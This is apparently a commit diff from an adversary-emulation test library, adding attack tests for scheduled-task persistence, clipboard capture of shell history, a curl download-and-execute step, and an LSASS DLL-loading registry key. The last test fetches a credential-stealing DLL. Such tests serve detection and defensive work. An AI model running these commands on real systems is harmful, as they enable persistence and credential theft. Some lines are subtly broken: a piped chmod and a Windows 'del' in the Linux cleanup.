New Atomic - T1547.008

Update T1115.yaml
Linux and Windows
2022-08-22 20:54:09 -06:00 · 2022-08-17 15:27:10 -06:00 · 2022-08-17 15:21:46 -06:00
6 changed files with 99 additions and 0 deletions
@@ -179,3 +179,25 @@ atomic_tests:
      Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
    cleanup_command: |
      Unregister-ScheduledTask -TaskName "atomic red team" -confirm:$false >$null 2>&1
+- name: PowerShell Modify A Scheduled Task
+  description: |
+    Create a scheduled task with an action and modify the action to do something else. The initial idea is to showcase Microsoft Windows TaskScheduler Operational log modification of an action on a Task already registered. 
+    It will first be created to spawn cmd.exe, but modified to run notepad.exe.
+
+    Upon successful execution, powershell.exe will create a scheduled task and modify the action. 
+  supported_platforms:
+    - windows
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      $Action = New-ScheduledTaskAction -Execute "cmd.exe"
+      $Trigger = New-ScheduledTaskTrigger -AtLogon
+      $User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
+      $Set = New-ScheduledTaskSettingsSet
+      $object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
+      Register-ScheduledTask AtomicTaskModifed -InputObject $object
+      $NewAction = New-ScheduledTaskAction -Execute "Notepad.exe"
+      Set-ScheduledTask "AtomicTaskModifed" -Action $NewAction
+    cleanup_command: |
+      Unregister-ScheduledTask -TaskName "AtomicTaskModifed" -confirm:$false >$null 2>&1
@@ -325,3 +325,13 @@ atomic_tests:
      remove-item $env:temp\$resultsfolder -recurse -force -erroraction silentlycontinue
    name: powershell
    elevation_required: true
+- name: Linux List Kernel Modules
+  description: |
+    Identify kernel modules installed. Upon successful execution stdout will display kernel modules installed on host.
+  supported_platforms:
+  - linux
+  executor:
+    command: |
+      sudo lsmod
+      sudo kmod list
+    name: sh
@@ -715,3 +715,23 @@ atomic_tests:
    command: 'wscript.exe #{vbscript_file}'
    cleanup_command: del Atomic-License.txt >nul 2>&1
    name: command_prompt
+- name: Linux Download File and Run
+  description: |
+    Utilize linux Curl to download a remote file, chmod +x it and run it.
+  supported_platforms:
+    - linux
+  input_arguments:
+    remote_url:
+      description: url of remote payload
+      type: string
+      default:  https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/
+    payload_name:
+      description: payload name
+      type: string
+      default:  atomic.sh
+  executor:
+    command: |
+      curl -sO #{remote_url}; chmod +x #{payload_name} | bash #{payload_name}
+    cleanup_command: |
+      del #{payload_name}
+    name: sh
@@ -0,0 +1,2 @@
+#!/bin/bash 
+echo "Hello From Atomic Red Team"
@@ -69,3 +69,14 @@ atomic_tests:
    cleanup_command: |
      Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt" -ErrorAction Ignore
    name: powershell
+- name: Add or copy content to clipboard with xClip
+  description: |
+    Utilize Linux Xclip to copy history and place in clipboard then output to a history.txt file. Successful execution will capture history and output to a file on disk.
+  supported_platforms:
+  - linux
+  executor:
+    command: |
+      apt install xclip -y
+      history | tail -n 30 | xclip -sel clip
+      xclip -o > history.txt
+    name: sh
@@ -0,0 +1,34 @@
+attack_technique: T1547.008
+display_name: 'Boot or Logon Autostart Execution: LSASS Driver'
+atomic_tests:
+- name: Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt
+  description: |
+    The following Atomic will modify an undocumented registry key that may be abused to load a arbitrary DLL into LSASS. 
+    
+    Upon execution, the registry key will be modified and a value will contain the path to the DLL. 
+    Reference: https://blog.xpnsec.com/exploring-mimikatz-part-1/ and source https://github.com/oxfemale/LogonCredentialsSteal
+    Note that if any LSA based protection is enabled, this will most likely not be successful with LSASS.exe loading the DLL.
+  supported_platforms:
+  - windows
+  input_arguments:
+    dll_path:
+      description: Module to be loaded into LSASS
+      type: Path
+      default: '$env:TEMP\lsass_lib.dll'
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      lsass_lib.dll must exist on disk at specified location (#{dll_path})
+    prereq_command: |
+      if (Test-Path #{dll_path}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      Invoke-WebRequest "https://github.com/oxfemale/LogonCredentialsSteal/raw/master/lsass_lib/x64/Release/lsass_lib.dll" -UseBasicParsing -OutFile "#{dll_path}"
+  executor:
+    command: |
+      New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NTDS -Name LsaDbExtPt -Value "#{dll_path}"
+    cleanup_command: |
+      Remove-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\NTDS" -Name "LsaDbExtPt" -ErrorAction Ignore | Out-Null
+      Remove-Item $env:TEMP\lsass_lib.dll -Force
+    name: powershell
+    elevation_required: true
Author	SHA1	Message	Date
Michael Haag	f3eea30be3	New Atomic - T1547.008	2022-08-22 20:54:09 -06:00
Michael Haag	2154c25000	Update T1115.yaml	2022-08-17 15:27:10 -06:00
Michael Haag	ee6dd2edd5	Linux and Windows	2022-08-17 15:21:46 -06:00